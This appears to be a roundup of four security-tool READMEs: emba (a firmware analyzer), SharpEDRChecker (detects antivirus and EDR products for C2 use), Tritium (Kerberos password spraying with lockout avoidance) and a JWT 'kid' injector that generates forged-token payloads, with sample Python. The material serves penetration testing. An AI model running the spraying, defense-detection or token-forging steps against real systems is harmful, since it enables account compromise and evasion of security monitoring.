Emba - An Analyzer For Linux-based Firmware Of Embedded Devices



emba is being developed as a firmware scanner that analyses already-extracted Linux-based firmware images. It should help you to identify and focus on the interesting areas of a huge firmware image. Although emba is optimized for offline firmware images, it can test both live systems and extracted images. Additionally, it can also analyze kernel configurations. emba is designed to assist a penetration tester; it is not designed as a standalone tool without human interaction. emba is designed to give as much information as possible about the firmware. The tester can decide on the areas to focus on and is always responsible for verifying and interpreting the results.


How to use it?

Before starting, check that all dependencies are met (./emba.sh -d or ./emba.sh -d -F) and use the installer.sh script to install anything that is missing.


Arguments:
Test firmware / live system
-a [MIPS] Architecture of the linux firmware [MIPS, ARM, x86, x64, PPC]
-A [MIPS] Force Architecture of the linux firmware [MIPS, ARM, x86, x64, PPC] (disable architecture check)
-l [./path] Log path
-f [./path] Firmware path
-e [./path] Exclude paths from testing (multiple usage possible)
-m [MODULE_NO.] Test only with set modules [e.g. -m p05 -m s10 ... ]]
(multiple usage possible, case insensitive; final modules aren't selectable; if the firmware isn't a binary, the p modules won't run)
-c Enable cwe-checker
-g Create grep-able log file in [log_path]/fw_grep.log
Schematic: MESSAGE_TYPE;MODULE_NUMBER;SUB_MODULE_NUMBER;MESSAGE
-E Enable automated qemu emulation tests (WARNING this module could harm your host!)

Dependency check
-d Only check dependencies
-F Check dependencies but ignore errors

Special tests
-k [./config] Kernel config path

Modify output
-s Print only relative paths
-z Add ANSI color codes to log

Help
-h Print this help message

Docker Container

A simple docker-compose setup has been added which allows you to do everything except use the cwe-checker.

To run it simply do the following:

Build it:

docker-compose build emba

Run it:

FIRMWARE=/absolute/path/to/firmware LOG=/home/n/firmware_log/ docker-compose run emba

This will drop you into a shell in the folder where emba has been added. The firmware is located at /firmware/ and the log directory at /log/.

./emba.sh -l /log/ -f /firmware/

Examples

Static firmware testing:
  • Extract the firmware from an update file or from flash storage with binwalk or something else
  • Execute emba with set parameters, e.g.

sudo ./emba.sh -l ./logs/arm_test -f ./firmware/arm_firmware/


 

  • Path for logs and firmware path are necessary for testing successfully (WARNING: emba needs some free disk space for logging)
  • Architecture will be detected automatically; you can overwrite it with -a [ARCH]
  • Use -A [ARCH] if you don't want to use auto detection for architecture
  • emba currently supports the following architectures: MIPS, ARM, PPC, x86 and x64

Live testing:

To test a live system with emba, run it as if you were testing static firmware, but with / as the firmware path:

sudo ./emba.sh -l ./logs/local_test -f /

  • Path for logs and firmware path are necessary for testing successfully
  • Architecture will be detected automatically; you can overwrite it with -a [ARCH]
  • Use -A [ARCH] if you don't want to use auto detection for architecture
  • The paths /proc and /sys will be automatically excluded
  • It improves output and performance if you exclude docker:
    -e /var/lib/docker

Test kernel config:

Test only a kernel configuration with the kernel checker of checksec:

sudo ./emba.sh -l ./logs/kernel_conf -k ./kernel.config

  • If you add -f ./firmware/x86_firmware/, it will ignore -k and search for a kernel config inside the firmware

Good to know:


Dependencies

emba uses multiple other tools and components.

For using emba with all features, you will need the following tools on your Kali Linux:

  • readelf
  • find
  • grep
  • modinfo
  • realpath
  • sed
  • cut
  • sort
  • basename
  • strings
  • Option: tree
  • Option: shellcheck
  • Option: docker
  • Option: yara
  • Option: qemu static user mode emulators
  • Option: binwalk

To check these dependencies, just run sudo ./emba.sh -d

For installation of all needed dependencies, run sudo ./installer.sh


Structure
├── installer.sh

-> Tries to install all needed dependencies. Internet access for downloading is required.

  • Afterwards no Internet access is needed
├── check_project.sh

-> Checks the full project with all subdirectories using shellcheck

  • Install it on your system (Kali) with apt-get install shellcheck
├── emba.sh

-> Main script of this project

├── config

-> Configuration files for different modules with file names, regular expressions or paths. These files are very handy, easy to use and they also keep the modules clean.

├── external

-> All tools and files which are from other projects and necessary for emba

├── helpers

-> Some scripts for stuff like pretty formatting on your terminal or path handling

└── modules

-> The stars of the project - every module is its own file and will be called by emba.


External tools in directory 'external'

How to write own modules?

Look here - read this file, copy and modify it. Add your main function, where module_log_init and module_title are called, to the emba script. That's it. Or, if you only want to run a single command: add your command to user_check and uncomment user_check in the emba script.



SharpEDRChecker - Checks Running Processes, Process Metadata, DLLs Loaded Into Your Current Process And Each DLL's Metadata, Common Install Directories, Installed Services And Each Service Binary's Metadata, Installed Drivers And Each Driver's Metadata, All For The Presence Of Known Defensive Products Such As AVs, EDRs And Logging Tools


New and improved C# implementation of Invoke-EDRChecker. Checks running processes, process metadata, DLLs loaded into your current process and each DLL's metadata, common install directories, installed services and each service binary's metadata, installed drivers and each driver's metadata, all for the presence of known defensive products such as AVs, EDRs and logging tools. It catches hidden EDRs as well via its metadata checks; more info in a blog post coming soon.

This binary can be loaded into your C2 server by loading the module then running it. Note: this binary is now included in PoshC2 so no need to manually add it.


I will continue to add and improve the list when time permits. A full roadmap can be found below.

Find me on Twitter @PwnDexter for any issues or questions!


Install & Compile

Git clone the repo and open the solution in Visual Studio, then build the project; alternatively, download the latest release from here.

git clone https://github.com/PwnDexter/SharpEDRChecker.git

Usage

Once the binary has been loaded onto your host or into your C2 of choice, you can use the following commands:

Run the binary against the local host and perform checks based on current user integrity:

.\SharpEDRChecker.exe
run-exe SharpEDRChecker.Program SharpEDRChecker

For use in PoshC2, use the following:

sharpedrchecker

Roadmap
  • Add more EDR Products - never ending
  • Test across more Windows and .NET versions
  • Add remote host query capability
  • Port to python for unix/macos support

Example Output

Initial start down C2:

 

Processes:


Modloads in your process:


Directories:


Services:


Drivers:


 TLDR Summary:



Tritium - Password Spraying Framework



A tool to enumerate and spray valid Active Directory accounts through Kerberos Pre-Authentication.


Background

Although many Kerberos password spraying tools currently exist on the market, I found it difficult to find tools with the following built-in functionality:

  • The ability to prevent users from locking out the domain
  • The ability to integrate username enumeration with the password spraying process (user enumeration is a separate functionality from the spray)
  • The ability to recursively spray passwords rather than running one spray at a time
  • The ability to resume password sprays and ignore previously compromised accounts

Tritium solves all of the issues mentioned above and more. User enumeration no longer wastes a login attempt because Tritium uses the output of the first spray to generate a file of valid users. Tritium also gives the user the ability to pass it a password file to recursively spray passwords. Finally, Tritium has built-in functionality to detect whether a domain is being locked out due to password spraying: it saves its state and quits the spray if 3 consecutive accounts are locked out (a rough sketch of that abort logic follows).
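The following minimal Python sketch is illustrative only (it is not Tritium's code; the try_auth callback and state file format are hypothetical), showing the kind of consecutive-lockout guard described above:

# lockout_guard_sketch.py - illustrative only; Tritium's actual implementation differs
# Aborts a spray (and saves state) once 3 consecutive accounts come back locked out.
import json

MAX_CONSECUTIVE_LOCKOUTS = 3

def spray(users, password, try_auth, state_file="spray.json"):
    consecutive_lockouts = 0
    results = {}
    for user in users:
        status = try_auth(user, password)   # hypothetical callback: "valid", "invalid" or "locked"
        results[user] = status
        consecutive_lockouts = consecutive_lockouts + 1 if status == "locked" else 0
        if consecutive_lockouts >= MAX_CONSECUTIVE_LOCKOUTS:
            # Save state so the campaign can be resumed later, then stop spraying
            with open(state_file, "w") as fh:
                json.dump(results, fh)
            raise SystemExit("3 consecutive lockouts detected - aborting spray")
    return results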


Usage
 ./Tritium -h

___________ .__ __ .__
\__ ___/______|__|/ |_|__|__ __ _____
| | \_ __ \ \ __\ | | \/ \
| | | | \/ || | | | | / Y Y \
|____| |__| |__||__| |__|____/|__|_|__/ v 0.4


Author: S4R1N, alfarom256



Required Params:

-d The full domain to use (-domain targetdomain.local)
-dc Domain controller to authenticate against (-dc washingtondc.targetdomain.local)
-dcf File of domain controllers to authenticate against
-u Select single user to authenticate as (-user jsmith)
-uf User file to use for password spraying (-userfile ~/home/users.txt)
-p Password to use for spraying (-password Welcome1)

Optional:

-help Print this help menu
-o Tritium Output file (default spray.json)
-w Wait time between authentication attempts [Default 1] (-w 0)
-jitter % Jitter between authentication attempts
-rs Enable recursive spraying
-ws Wait time between sprays [Default 3600] (-ws 1800)
-pwf Password file to use for recursive spraying
-res Continue a password spraying campaign
-rf Tritium Json file

Under Development

Below are some of the features being developed:

  • Ability to capture ^C and save state if process was killed manually
  • Other stuff ;)


JWT Key ID Injector - Simple Python Script To Check Against Hypothetical JWT Vulnerability



Simple python script to check against hypothetical JWT vulnerability.


Let's say there is an application that uses JWT tokens signed with the HS256 algorithm. An example token looks as follows:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.zbgd5BNF1cqQ_prCEqIvBTjSxMS8bDLnJAE_wE-0Cxg

The above token can be decoded to the following data:

{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1516239022
}

To calculate the signature, the following secret is used:

supersecret

The following pseudo code is used to calculate the signature:

$alg = "sha256";
$data = "...";
$key = "supersecret";

hmac($alg, $data, $key);
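For reference, a minimal Python sketch of the same HS256 computation (not taken from any particular application; it simply signs the token's header.payload part with the secret above):

# hs256_sketch.py - minimal illustration of an HS256 JWT signature
import base64
import hashlib
import hmac

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(signing_input: bytes, key: bytes) -> str:
    # signature = HMAC-SHA256(key, "<base64url(header)>.<base64url(payload)>")
    return b64url(hmac.new(key, signing_input, hashlib.sha256).digest())

header_and_payload = b"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ"
print(sign_hs256(header_and_payload, b"supersecret"))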

But what if an unexpected "kid":0 field is injected into the header?

{
  "alg": "HS256",
  "typ": "JWT",
  "kid": 0
}
{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1516239022
}

The kid field is a standard way to choose a key. My assumption is that, if the kid field is not expected, there may be a vulnerable implementation that treats the string $key value as an array:

hmac($alg, $data, $key[kid]);

As a result, the "s" character ($key[0]) will be used as the HMAC secret.


Usage

The injector.py script takes the original JWT token, injects a "kid":0 field into the header and generates tokens signed with one-letter secrets (ASCII codes 32 - 126: [{space}, !, ", #, ..., x, y, z, {, |, }, ~]):

python3 injector.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.zbgd5BNF1cqQ_prCEqIvBTjSxMS8bDLnJAE_wE-0Cxg

As a result, two files are created - tokens.txt and tokens_meta.txt. tokens.txt contains the generated tokens and can be used as a list of payloads for Burp Intruder. If any token is valid (which means the application is vulnerable), the tokens_meta.txt file can be used to check which algorithm and secret were used to generate the given token. The tokens_meta.txt file contains the following data:

token1:algorithm:secret
...
token{n}:algorithm:secret
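For illustration, a stripped-down Python sketch of the same idea (this is not the actual injector.py; its output format and option handling differ):

# kid_injector_sketch.py - simplified illustration, not the actual injector.py
import base64
import hashlib
import hmac
import json
import sys

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def generate(token: str):
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    header["kid"] = 0                       # inject the unexpected kid field
    new_header_b64 = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    signing_input = ("%s.%s" % (new_header_b64, payload_b64)).encode()
    for code in range(32, 127):             # every printable one-character secret
        secret = chr(code).encode()
        sig = b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())
        yield "%s.%s.%s" % (new_header_b64, payload_b64, sig), chr(code)

if __name__ == "__main__":
    for candidate, secret in generate(sys.argv[1]):
        print(candidate, "HS256", repr(secret))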

Changes

Please see the CHANGELOG


